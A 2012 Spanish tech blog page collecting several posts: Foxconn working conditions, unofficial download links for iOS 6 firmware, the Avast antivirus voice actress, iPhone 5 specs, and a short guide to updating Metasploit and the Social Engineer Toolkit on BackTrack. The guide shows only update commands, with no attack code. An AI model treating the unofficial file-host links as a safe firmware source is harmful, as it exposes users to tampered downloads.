Travolta Bloqueo Fail 415x1024 Los aviones de los famosos no son tan privados

Las conclusiones de este post son sencillas, caer en la cuenta de lo delicado que es publicar información personal en la red, nunca se sabe quien puede acceder a ellas y con que fines. Espero que les gustara el articulo, los invito a dejar su comentario o compartirlo en las redes sociales.

Actualizado 15/Septiembre/2012:
Gracias a un comentario de c1b3rh4ck me entero que Alejandro de SpamLoco había escrito sobre planefinder una aplicación web que permite monitorear las aeronaves y vuelos, servicio que podría complementar la información de este post, por lo que recomiendo su lectura.


Fuente

sábado, 15 de septiembre de 2012

Un reportaje revela que el iPhone 5 viene de un infierno




 
El iPhone 5 tendrá ventas millonarias, por lo que la cadena de producción debe estar a la par. Parece que el costo de lograrlo se mide en vidas humanas. En los últimos días han aparecido nuevos reportes sobre los maltratos a los empleados del gigante manufacturero Foxconn, que detallan una vez más las malas condiciones de trabajo de las plantas, la presión psicológica constante a la que están sometidos los empleados y los abusos que la firma comete con el objetivo de cumplir con su exigente cuota de producción: 57 millones de iPhone 5 en un año, según el diario Shanghai Evening Post, citado por The Guardian.


El episodio más reciente es el suicidio de un trabajador de 22 años, que según el reporte de la agencia China News se lanzó de un apartamento cercano a una de las plantas de Shenzen, en China, donde en 2010 se habían reportado varios episodios similares. Un reporte de China Labor Watch, una ONG que vigila las condiciones laborales en las grandes manufactureras del gigante asiático, dice que 18 empleados de Foxconn se han quitado la vida en dos años.

¿Qué lleva a estos jóvenes –que tienen un trabajo que es considerado por muchos en China como una salida a la pobreza– a tomar esa decisión? Para averiguarlo, un reportero del Shanghai Evening Post pasó 10 días infiltrado en la planta. Tras 4 días de capacitación, entró a la línea de producción.

“Una platina posterior de iPhone 5 pasaba frente a mí casi cada tres segundos. Tenía que tomar la platina, marcar cuatro puntos de posición usando una pluma de pintura basada en aceite y devolverla a la banda transportadora en tres segundos, sin errores. Tras repetir esa acción por muchas horas, tenía un terrible dolor en mi cuello y mi brazo“, cuenta el periodista.

La jornada dura 10 horas, y al reportero le tocaba comenzar a medianoche. Si alguno de los operarios espabilaba o se cansaba, era tratado como en el colegio: el supervisor lo retiraba y lo llevaba a una esquina de la fábrica por 10 minutos. El asunto es que, según sus jefes, los empleados tenían que estar agradecidos por la oportunidad. “Deben estar orgullosos de poder fabricar el iPhone 5“, le dijeron al reportero en su jornada de inducción.

En la planta se trabaja en medio de “fuertes sonidos de maquinaria y un olor a plástico muy denso“. En los dormitorios de las fábricas, las condiciones no son mejores: “huelen a caucho, sudor y espuma” y tienen “cucarachas en los guardarropas y sábanas sucias“. Luego del escándalo de los suicidios, se pusieron barrotes de metal en las ventanas de las habitaciones.

Según The Register, la compañía dijo que investigará las denuncias sobre las condiciones en la planta. “No somos perfectos“, admitieron.

Menores en las fábricas.
Cuando la demanda de trabajadores aumentó por la oferta de iPhone 5, Foxconn encontró parte de la mano de obra en el lugar más barato posible: los colegios. En calidad de ‘practicantes’, 32.000 menores entraron a las líneas de producción del gigante chino.

La compañía reconoció, según The New York Times, que empleaba a los estudiantes, y aseguró que ellos “son libres de abandonar en cualquier momento“. Pero, según China Labor Watch, sus profesores no son tan flexibles: “Dicen que son obligados a trabajar por los maestros“, pues “si no lo hacen no se graduarán“, relata el presidente de la ONG, Li Qiang. “Ellos no quieren estar ahí. Quieren aprender“, señala el activista.

Foxconn no solo es proveedor de Apple, sino también de Samsung, Dell y otros gigantes tecnológicos. Pese a ello, Tim Cook había hecho gestiones para mejorar las condiciones de trabajo en las fábricas. Pero parece que eso de ser buen patrono se olvida cuando hay que fabricar millones de iPhone 5 en tan poco tiempo.

Enter.co

Disponibles los enlaces para bajar anticipadamente el iOS 6


Para los impacientes, alguien ya se tomó la molestia de subir los Golden Master* de iOS6. Instalé el de mi 4S (versión 10A403) esta mañana y funciona muy bien

*(Golden Master es la denominación que usa Apple para la versión final del firmware para sus dispositivos iOS (iPhone, iPad, etc), que se entrega de manera anticipada a los desarrolladores. No es un beta ni una versión de evaluación, sino la versión final del software. )

iPad 3 GSM:
Torrent: http://www.sendspace.com/file/8mugce
Torrent Mirror: http://www.slingfile.com/file/YaHzxx7cv7
Direct Download Mirror: http://www.slingfile.com/file/BdqT5I7vsL

iPad 3 WiFi:
Torrent: http://www.sendspace.com/file/hlu4nt
Torrent Mirror: http://www.slingfile.com/file/GHKtYGCOWm
Direct Download Mirror: http://www.slingfile.com/file/CzXCQHcygY

iPad 2 Rev A
Torrent: http://www.sendspace.com/file/0eno6c
Torrent Mirror: http://www.slingfile.com/file/jgA7rZv16D
Direct Download Mirror: http://www.slingfile.com/file/hM61THvrYI

iPad 2 GSM
Torrent: http://www.sendspace.com/file/nqfthw
Torrent Mirror 1: http://www.slingfile.com/file/Wklh5Vm4BO

iPad 2 WiFi:
Torrent: http://www.sendspace.com/file/h911zr
Torrent Mirror: http://www.slingfile.com/file/e33j1ZTWDb
Direct Download Mirror: http://www.slingfile.com/file/XFXnyxxZXC

iPhone 4S:
Torrent: http://www.sendspace.com/file/j7yfoy
Torrent Mirror: http://www.slingfile.com/file/qVYmLa3TaH
Direct Download Mirror: http://www.slingfile.com/file/9pOqaCeO4q

iPhone 4 GSM
Torrent: http://www.sendspace.com/file/36fo4p
Torrent Mirror: http://www.slingfile.com/file/bA2ECm8DJ5
Direct Download Mirror: http://www.slingfile.com/file/1FB5hquNbR

iPhone 3GS
Torrent: http://www.sendspace.com/file/ln6mpq
Torrent Mirror: http://www.slingfile.com/file/Pd8vpNEQoJ
Direct Download Mirror: http://www.slingfile.com/file/GS1EadbVvI

iPod Touch 4G
Torrent: http://www.sendspace.com/file/vemvyk
Torrent Mirror: http://www.slingfile.com/file/xWJO3vcQAz
Direct Download Mirror: http://www.slingfile.com/file/wVb1H9dgFG


FUENTE: http://imzdl.tumblr.com/

Para actualizar manualmente su dispositivo:
  • Descargar firmware del iOS (extensión .ipsw)
  • Conectar el dispositivo al computador
  • En el ITunes seleccionar el dispositivo del lado izquierdo del menú
  • Dependiendo de nuestro sistema operativo, haremos lo siguiente:
  • En Windows: Presionar la tecla Shift + el botón de Buscar Actualización
  • En Mac: Presionar la tecla Option + el botón de Buscar Actualización (o shift o alt, lo que importa es que salga la ventana para seleccionar el archivo del firmware)
  • Aparecerá una ventana de explorar, buscamos nuestro archivo .ipsw y clic en aceptar
  • Seguir las instrucciones y esperar un poco. La actualización toma entre 15 a 20 minutos, y el dispositivo queda como si nada, con todas sus configuraciones, aplicaciones y datos intactos.

El iTunes valida el firmware descargado, de modo que no existe la posibilidad de instalar el software incorrecto en el dispositivo. Feliz actualización!

La famosa voz femenina del antivirus Avast da la cara

Joanna Rubio, es la protagonista de la reconocida frase "la base de datos del virus ha sido actualizada"


La voz femenina del antivirus Avast dio la cara y puso rostro, nombre y apellidos a la locutora de la frase publicitaria "la base de datos del virus ha sido actualizada", con consecuencias que ni ella misma hubiera imaginado.
Según relató a Efe Joanna Rubio, desde hace apenas una semana le "llueven los 'emails' y los comentarios por foros y redes".

Todo empezó, dijo, cuando comenzó a recibir "montones" de mensajes sobre su "bonita" y "sensual" voz en su correo electrónico, que ella misma facilita en su pagina web de autopromoción (www.joannarubioproductions.com).

Desde hacía algún tiempo, explicó, había algunos foros en los que sus participantes se preguntaban, especialmente en América Latina, de quién era la voz de Avast.
Una vez que localizaron su "mail", señaló Rubio, sus admiradores le pidieron que diera la cara y ella "por seguir el juego" colgó un vídeo suyo en Youtube repitiendo la famosa frase
El video ya tiene en Youtube 250.000 visualizaciones y 241 comentarios de muy diverso tenor.

A partir de ahí, esta joven que reside en Madrid, aseguró que muchos de los mensajes proceden de Argentina, porque también ha trascendido que su madre es de ese país.
Lo curioso, manifestó, es que la citada frase publicitaria se grabó en 2009, en la República Checa, donde tiene su sede la empresa del conocido antivirus
Según Rubio, también fue la voz de marcas como Armani o Lancome, ya que trabaja en doblaje, además de en producción musical.



http://www.elespectador.com/noticias...-avast-da-cara

Apple anuncia el iPhone 5 y nuevos modelos de iPod Touch y Nano

El día de hoy se llevó a cabo el evento de lanzamiento del iPhone 5. Ya se conocían muchas filtraciones sobre este nuevo modelo las cuales resultaron siendo ciertas.


Estas son las caracteristicas de la nueva versión del iPhone
  • Diseño exterior mas delgado conservando la misma linea del iPhone 4 y 4S con 7.6mm de grosor y 112 gramos de peso
  • Construcción en vidrio y aluminio
  • Pantalla retina de 1136 x 640 de resolución y 4" con aspecto 16:9
  • Conexión 4G LTE en un solo chip para datos y voz
  • Conexión Wi-Fi 802.11 a/b/g/n
  • Cámara de 8 megapixeles con apertura f/2.4, filtro hibrido infrarrojo y mejor desempeño en luz baja
  • Cámara frontal para Facetime 720p
  • Toma de fotos panorámicas
  • Grabación de videos en 1080p con posibilidad de tomar fotos mientras se graba
  • Procesador Apple A6 hasta dos veces más rápido que el modelo anterior
  • iOS 6
  • 3 microfonos incorporados para mejorar la calidad de sonido en las llamadas
  • Siri mejorado. Ahora podrá dar resultados de deportes, hacer reservaciones en restaurantes y eventos entre otros.
  • Nuevo conector de 8 pines Lightning
  • Hasta 8 horas de duración de batería en conversación con 3G activado, 8 horas navegando por conexión LTE o 3G, 10 horas de navegación por Wi-Fi y 225 horas en reposo.
  • Uso de Nano SIM
  • Disponible en color negro y blanco
  • $199 por el modelo de 16GB con contrato a dos años, $299 por 32GB y $399 por 64GB. Esto en Estados Unidos
  • Preordenes a partir del 14 de Septiembre y se comienza a distribuir el 21 de Septiembre en Estados Unidos, Reino Unido, Canada, Francia, Alemania, Australia, Japon, Hong Kong y Singapur. Desde Septiembre 28 se empieza a distribuir a otros paises

Audifonos EarPods

Después de muchos años Apple ha rediseñado sus audifonos convencionales y los ha llamado EarPods. La principal caracteristicas de estos nuevos audifonos es que dirigen el sonido directamente al canal auditivo sin aislar completamente el sonido ambiental como sucede con los audifonos In-Ear convencionales. Estos audifonos se venderán por separado por 30 dolares y también serán incluidos en el iPhone 5 y los nuevos iPods.


iPod Touch


Luego de la decepción causada por la no renovación del iPod Touch en el 2011, Apple actualizó notablemente sus modelos de iPod Touch y los dotó de las siguientes caracteristicas
  • Pantalla Retina de 4" como en el iPhone 5
  • 6.1mm de grosor y 88 gramos de peso
  • Procesador A5
  • Hasta 40 horas de duración de batería escuchando música y 8 horas en video
  • Cámara de 5 megapixeles con flash integrado y apertura f/2.4. Incluye las mismas caracteristicas de la cámara del iPhone 5
  • Cámara frontal con soporte 720p
  • Conectividad Bluetooth 4.0 y Wi-Fi 802.11 a/b/g/n
  • Conector de 8 pines Lightning
  • Soporte AirPlay Mirroring
  • iOS 6
  • Soporte completo para Siri
  • Disponible en varios colores a partir de Octubre
  • La 4ta generación de iPod Touch se sigue vendiendo en versiones de 16gb por $199 y 32gb por $249
  • Precio: 32GB por $299 y 64gb por $399
iPod Nano
El iPod Nano vuelve a su formato alargado con un diseño nuevo.


Estas son las caracteristicas
  • Grosor de 5.4mm y peso de 31 gramos
  • 16gb de capacidad de almacenamiento
  • Pantalla Multitouch de 2.5 pulgadas y resolución 240x432
  • 202 pixeles por pulgadas (parece indicar que no es Retina Display)
  • Conector de 8 pines Lightning
  • Reproducción de video soportada
  • Sintonizador FM y Bluetooth integrado
  • Aplicaciones dedicadas para ejercicios físicos y contador de pasos
  • Hasta 30 horas de batería para música y 3.5 horas para video
  • Precio: $150. Disponible en Octubre.

Fuentes: The Verge
              Engadget
              Engadget
             The Verge

jueves, 13 de septiembre de 2012

Como actualizar Metasploit Framework & Social Engineer Toolkit en BackTrack 5

Social Engineer Toolkit (SET) se integra muy bien con Metasploit. Al usar cualquier de estas herramientas, siempre es bueno asegurarse de tener la ultima versión. Con Metasploit la regla de oro es actualizarlo a diario jeje bueno al menos cuando lo utilices, ten asegurado de tener la ultima versión, antes de cualquier prueba.
Para actualizar Metasploit Framework solo tenemos que ir al Menu BackTrack - Exploitation Tools - Network Exploitation Tools - Metasploit Framework - msfupdate o también lo podemos hacer desde consola, tecleando el siguiente comando.
#msfupdate
 
Para actualizar la herramienta Social Engineer Toolkit (SET) solo tenemos que ir a la dirección donde se encuentra la herramienta y ejecutarla.

root@bt:~# cd /pentest/exploits/set/
 
root@bt:/pentest/exploits/set# ls
 
config  modules  readme  reports  set  set-automate 
set-proxy  set-update setup.py  set-web  src
 
root@bt:/pentest/exploits/set# ./set
 
Una vez ejecutado nos preguntara la tarea que deseamos realizar.

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> 5
 
Elegimos la opción 5, que es para actualizar y listo. También podemos hacerlo en un solo paso desde consola tecleando el siguiente comando. ./set-update

root@bt:/pentest/exploits/set# ./set-update